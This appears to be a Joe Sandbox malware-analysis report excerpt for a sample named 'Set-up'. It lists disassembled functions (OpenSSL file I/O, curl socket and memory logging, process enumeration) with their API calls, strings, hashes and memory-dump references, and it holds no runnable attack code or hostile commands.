Opcode ID: c2ce028632caca88b0e0becb05ab1e81d5be48db885c67a642766dc4cfd1fd50
Instruction ID: b53892641f22b4d22ddfb0b3aa04cd29f9dc3f924d57411583aecbe57921d05c
Opcode Fuzzy Hash: c2ce028632caca88b0e0becb05ab1e81d5be48db885c67a642766dc4cfd1fd50
Instruction Fuzzy Hash: 5511C8F59083546BD130BB5AAC49E27BBACDB81B2CF15061CF91893245FB61ED00CBB5

Function 00E047B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E5E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E5E2
Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E5FA
Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00E5E637
Part of subcall function 00E5E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00DEA31E), ref: 00E5E64D
Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00DEA31E,00000001,?,00000008,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000), ref: 00E5E665
Part of subcall function 00E5E5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E678
Part of subcall function 00E5E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E685
Part of subcall function 00E5E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E690
Part of subcall function 00E5E5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E), ref: 00E5E6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,012561B4), ref: 00E047CC
GetLastError.KERNEL32(?,?,?,?,?,?,012561B4), ref: 00E0483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,012561B4), ref: 00E04855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,012561B4), ref: 00E04860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,012561B4), ref: 00E0488E

Strings

crypto/bio/bss_file.c, xrefs: 00E04830, 00E04877, 00E048A4
calling fopen(%s, %s), xrefs: 00E04845
BIO_new_file, xrefs: 00E04829, 00E04870, 00E0489D

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: 4a688babe66aeb0f6b5795abf4a424add8d50aea2f07cfa4e7aeb4e48ff579f0
Instruction ID: 2a1c62eb38b4ef5b96505c715c731732927d7ea06189b5cc8aa6de4783fe5782
Opcode Fuzzy Hash: 4a688babe66aeb0f6b5795abf4a424add8d50aea2f07cfa4e7aeb4e48ff579f0
Instruction Fuzzy Hash: 562128E5F84304BBE2B032623C47F2B399DCB51B5CF085824FE49741C2E561995482B3

Function 00C87770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,00CB94BF,?), ref: 00C877AE
recv.WS2_32(?,?,00CB94BF,?), ref: 00C877BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 00C877F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8781D

Strings

RECV %s:%d recv(%lu) = %ld, xrefs: 00C877C8
LIMIT %s:%d %s reached memlimit, xrefs: 00C877E2, 00C87801
recv, xrefs: 00C877DB, 00C877FA

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: ae58e7d0bc6387cdefead802c489fabf5b376e116003e16c28bc65c84118233a
Instruction ID: 914dca990a59cb2f4632ac42bbd1ba5e40c8feb1e267fabc427858448fed6c1c
Opcode Fuzzy Hash: ae58e7d0bc6387cdefead802c489fabf5b376e116003e16c28bc65c84118233a
Instruction Fuzzy Hash: 9311E6B8908354BBD130AB65AC4DE277B6CEB85B2DF15061CF91853286EB61EC00C7B5

Function 00C875E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00C87618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00C87659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C8767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C87685

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00C8764A, 00C87669
FD %s:%d socket() = %d, xrefs: 00C8762E
socket, xrefs: 00C87643, 00C87662

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: 165e2da8b356fb461cf166734acee2c17690c607de1c43319c4560fc325dd199
Instruction ID: 9f26c2a2cd5b9e35d59a3a33fdf37b92b6b367ed5d0ffe46f6b9f57441d7386f
Opcode Fuzzy Hash: 165e2da8b356fb461cf166734acee2c17690c607de1c43319c4560fc325dd199
Instruction Fuzzy Hash: 1D1159B5A002116BD630BA6EAC0AF4B7F9CDF80739F180618F924D22D2F721DC50D7A1

Function 0100D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100D1E8

Strings

Inf, xrefs: 0100DCA5, 0100DCBD
@, xrefs: 0100D4B7
NaN, xrefs: 0100DBAB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 5b81ffe446983ebee5c99d1d0c7399927a403a77fe796a59009cd654fd1c4447
Instruction ID: 5a0013083c4250155186ea6569dfe10a7b259f54a22159b0cb5f356b42475450
Opcode Fuzzy Hash: 5b81ffe446983ebee5c99d1d0c7399927a403a77fe796a59009cd654fd1c4447
Instruction Fuzzy Hash: 0DF1C07060C3858BE7629FA8C4907AFBBE2BB85314F048A6DD9DD873C1D7359905CB92

Function 00CB9290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C876A0: send.WS2_32(multi.c,?,?,?), ref: 00C876DE

WSAGetLastError.WS2_32 ref: 00CB93C3

Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00CB935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CB9388

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00CB9447
cf-socket.c, xrefs: 00CB92CF
Send failure: %s, xrefs: 00CB93FB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: 3531a521d33a96ced184edd2ab430b5fc0e64c505f9363caaa5dfb7cfeccb06e
Instruction ID: 9dc21971b6a69b7c65141991fa8a5a12e0721a570416d798800742571000e2d8
Opcode Fuzzy Hash: 3531a521d33a96ced184edd2ab430b5fc0e64c505f9363caaa5dfb7cfeccb06e
Instruction Fuzzy Hash: 5151E275604305AFE710DF24C885FAAB7A5FF84314F14862DFE589B292E730EA91CB91

Function 00D477B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,012202CD,00000000,00000000,?,?,?,00D49882,?,00000000), ref: 00D477DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00D477F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00D47802
GetLastError.KERNEL32(?,00000000), ref: 00D4780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00D47830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00D47843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D4786B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: a20ede2f934da46978a5ad3af978e46e0c667962b96dad8965d0315255f147e0
Instruction ID: 9e87ea1cfabb9d7b2170b5831fee8c46fbe764aadef281704cdfd265a7dbd3d2
Opcode Fuzzy Hash: a20ede2f934da46978a5ad3af978e46e0c667962b96dad8965d0315255f147e0
Instruction Fuzzy Hash: 1B117FF1E0970567FA2229215C4AFAB355CEF91364F194439ED85D6281FA76D804C1B2

Function 00CBA150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00CBA1C6
WSAGetLastError.WS2_32 ref: 00CBA1D0

Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D0A1
Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0A9
Part of subcall function 00C9D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0CD
Part of subcall function 00C9D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0D7
Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00C9D381
Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00C9D3A2
Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D3BF
Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D3C9
Part of subcall function 00C9D090: SetLastError.KERNEL32(00000000), ref: 00C9D3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA220

Strings

getsockname() failed with errno %d: %s, xrefs: 00CBA1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00CBA23B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: 83795a4789c9fd788d0945c8b52b4f9a4f784466587d2e92c9a3f0f85345994e
Instruction ID: 58f4bfb6cb55c1938adeea5cbd3c73d74beed6824240c8809b7bfaa720413ea5
Opcode Fuzzy Hash: 83795a4789c9fd788d0945c8b52b4f9a4f784466587d2e92c9a3f0f85345994e
Instruction Fuzzy Hash: 9721E671804280ABF7269B59DC46FE677BCEF81328F040214F99853151FE32698587A3

Function 00C87310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873D2

Strings

calloc, xrefs: 00C87390, 00C873AF
LIMIT %s:%d %s reached memlimit, xrefs: 00C87397, 00C873B6
MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00C87376

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: 80364f55b4e81cf1b66d0e98cf9a7d6dd5ad9156cc3665f75c942d414759f299
Instruction ID: 24c91f6eaa0f95b08ebc73bf3a4a51903f75871d42202699f9d55b5168e5c9b0
Opcode Fuzzy Hash: 80364f55b4e81cf1b66d0e98cf9a7d6dd5ad9156cc3665f75c942d414759f299
Instruction Fuzzy Hash: DD21D1B5A043156BD730AF15EC46F17BB9CEB85B58F18092CFC1893252E771E90097A2

Function 00C831D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C831EF
Process32First.KERNEL32 ref: 00C83245
Process32Next.KERNEL32 ref: 00C832CC
CloseHandle.KERNELBASE ref: 00C832E7

Strings

name, xrefs: 00C83272
processes, xrefs: 00C832F3

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: name$processes
API String ID: 420147892-3597786721
Opcode ID: 851d6bb682f419e9d5fe563e34caf171397bc8e287b2701e0b08bc75d5cefc11
Instruction ID: f84ab6f3b144ad167f926e5f77452995e7d930eb96ad83ca1ce2c8e6909810bd
Opcode Fuzzy Hash: 851d6bb682f419e9d5fe563e34caf171397bc8e287b2701e0b08bc75d5cefc11
Instruction Fuzzy Hash: 9D31A3B49087059FCB44FFB8C58469EBBF4AF54344F00896DD8A8A7240E7349A44CF92

Function 00C871E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00C9D739,00000001,000000D9,system_win32.c), ref: 00C87263
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87287
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8728F

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00C87254, 00C87273
malloc, xrefs: 00C8724D, 00C8726C
MEM %s:%d malloc(%zu) = %p, xrefs: 00C87233

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
